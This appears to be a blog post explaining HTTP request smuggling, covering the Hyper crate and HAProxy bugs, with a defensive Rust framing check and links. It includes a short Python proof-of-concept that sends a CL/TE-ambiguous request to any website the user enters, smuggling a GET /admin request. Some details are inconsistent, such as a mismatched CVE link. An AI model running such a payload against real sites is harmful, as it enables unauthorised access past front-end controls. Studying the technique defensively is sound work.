Rust Hyper Request smuggling

The exploit of the day is a request smuggling vulnerability found in Hyper, the Rust HTTP library.


Request Smuggling

Request smuggling means sending two requests inside one payload. Normally you go to the website and one request is sent,
but with request smuggling you send one payload of data and fool the server into treating it as two different requests instead of one.
This method of attacking became very popular after it affected the popular HAProxy and the great security researcher https://twitter.com/albinowax
published a blog post about it.

HTTP smuggling has affected a lot of software like:
Netty
CVE-2020-7238
https://github.com/jdordonezn/CVE-2020-72381/issues/1

Apache tomcat

Nginx

HAProxy

Waitress

Gitlab

And many more, even Squid.

It even got a CWE(Common Weakness Enumeration) definition: “When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to “smuggle” a request to one device without the other device being aware of it.” https://cwe.mitre.org/data/definitions/444.html

An interesting discovery was made in the hyper HTTP crate.
It's a simple bug: the client handles the "Transfer-Encoding: chunked" part of the
GET request wrongly.

HAProxy

Nathan Davison reported a vulnerability in HAProxy:

Nathan Davison (@ndavison) reported that in legacy mode we didn't correctly
reject messages featuring a transfer-encoding header missing the "chunked"
value. The impact was limited, but if combined with "http-reuse always", it
could be used as a help to construct a content smuggling attack against a
vulnerable component employing a lenient parser which would ignore the
content-length header as soon as it sees a transfer-encoding one, without even
parsing it.

He then wrote a blog post about using HAProxy as a load balancer in front of a Python Flask backend;
by exploiting the fact that HAProxy doesn't reject the bad "Transfer-Encoding: chunked" messages,
he was able to carry out an HTTP smuggling attack.

https://nathandavison.com/blog/haproxy-http-request-smuggling https://www.mail-archive.com/haproxy@formilux.org/msg34926.html
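The strict framing check that both the hyper and the HAProxy passages above call for, as an added example written for this page and not taken from hyper or HAProxy: it classifies the body framing of one HTTP/1.1 request head per RFC 7230 section 3.3.3 and rejects the two ambiguous shapes, Transfer-Encoding alongside Content-Length (the PoC on this page) and Transfer-Encoding without a final "chunked" coding (the HAProxy report). The type and function names are my own assumptions.

```rust
// Added example, not hyper's or HAProxy's code: decide how a request body is
// framed and reject the ambiguous messages that request smuggling relies on.
#[derive(Debug, PartialEq)]
pub enum Framing {
    Chunked,
    ContentLength(u64),
    NoBody,
}
/// Takes the header block of one HTTP/1.1 request (request line plus headers, CRLF
/// separated) and returns the framing, or why it must be rejected (RFC 7230 3.3.3).
pub fn body_framing(head: &str) -> Result<Framing, String> {
    let mut te: Option<String> = None;
    let mut cl: Option<u64> = None;
    // skip(1) drops the request line; trailing empty strings come from the CRLFs.
    for line in head.split("\r\n").skip(1).filter(|l| !l.is_empty()) {
        let (name, value) = match line.split_once(':') {
            Some((n, v)) => (n.trim().to_ascii_lowercase(), v.trim()),
            None => return Err(format!("malformed header line: {line:?}")),
        };
        match name.as_str() {
            // Repeated TE headers are merged into one comma list, as the RFC allows.
            "transfer-encoding" => {
                te = Some(match te.take() {
                    Some(prev) => format!("{prev}, {value}"),
                    None => value.to_string(),
                });
            }
            "content-length" => {
                let n: u64 = value.parse().map_err(|_| format!("bad Content-Length: {value:?}"))?;
                if cl.map_or(false, |prev| prev != n) {
                    return Err("conflicting Content-Length values".to_string());
                }
                cl = Some(n);
            }
            _ => {}
        }
    }
    match (te, cl) {
        // The page's PoC: TE and CL together. A lenient parser silently picks one;
        // a strict one treats the pair as a smuggling attempt and rejects it.
        (Some(_), Some(_)) => Err("both Transfer-Encoding and Content-Length".to_string()),
        // The HAProxy bug: TE present but "chunked" is not the final coding, so the
        // body length cannot be determined and the message must be rejected.
        (Some(codings), None) => match codings.rsplit(',').next().map(str::trim) {
            Some(last) if last.eq_ignore_ascii_case("chunked") => Ok(Framing::Chunked),
            _ => Err(format!("Transfer-Encoding does not end in chunked: {codings:?}")),
        },
        (None, Some(n)) => Ok(Framing::ContentLength(n)),
        (None, None) => Ok(Framing::NoBody),
    }
}
```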

PoC example exploit

import socket

website = input('gimme website: ')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((website, 80))

# HTTP/1.1 lines end in CRLF, and the request is built as bytes so that
# sendall() accepts it under Python 3. Both Content-Length and
# Transfer-Encoding are sent; the second request after the terminating
# "0" chunk is the part the text describes as smuggled.
stuff = (
    "GET /stuff HTTP/1.1\r\n"
    "Host: {0}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 60\r\n"
    "Transfer-Encoding: chunked\r\n"
    "\r\n"
    "0\r\n"
    "\r\n"
    "GET /admin HTTP/1.1\r\n"
    "Host: {0}\r\n"
    "Foo: xGET /home HTTP/1.1\r\n"
    "Host: {0}\r\n"
    "\r\n"
).format(website).encode()

s.sendall(stuff)
response = s.recv(1024)  # increase the buffer size if needed
print('got back: ', response)
s.close()


https://crates.io/crates/hyper
https://docs.rs/hyper/

Check your cargo.toml files here:
https://rust.firosolutions.com

The hyper crate has been patched since version 0.12.34.

Request smuggling was also one of the challenges in a recent
capture-the-flag contest:

https://github.com/jdordonezn/CVE-2020-72381/issues/1
https://portswigger.net/web-security/request-smuggling/
https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
https://nathandavison.com/blog/haproxy-http-request-smuggling